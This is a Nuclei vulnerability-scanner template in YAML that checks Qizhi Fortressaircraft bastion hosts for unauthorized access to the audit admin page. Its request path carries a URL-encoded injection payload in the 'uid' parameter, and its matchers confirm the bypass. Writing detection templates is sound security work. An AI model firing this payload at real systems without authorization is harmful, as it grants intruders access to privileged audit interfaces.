nuclei-templates/http/vulnerabilities/other/qizhi-fortressaircraft-unau...

31 lines
711 B
YAML

id: qizhi-fortressaircraft-unauth
info:
name: Qizhi Fortressaircraft Unauthorized Access
author: ritikchaddha
severity: high
reference:
- https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw
tags: qizhi,fortressaircraft,unauth
metadata:
max-request: 1
http:
- method: GET
path:
- "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "错误的id"
- "审计管理员"
- "事件审计"
condition: and
- type: status
status:
- 200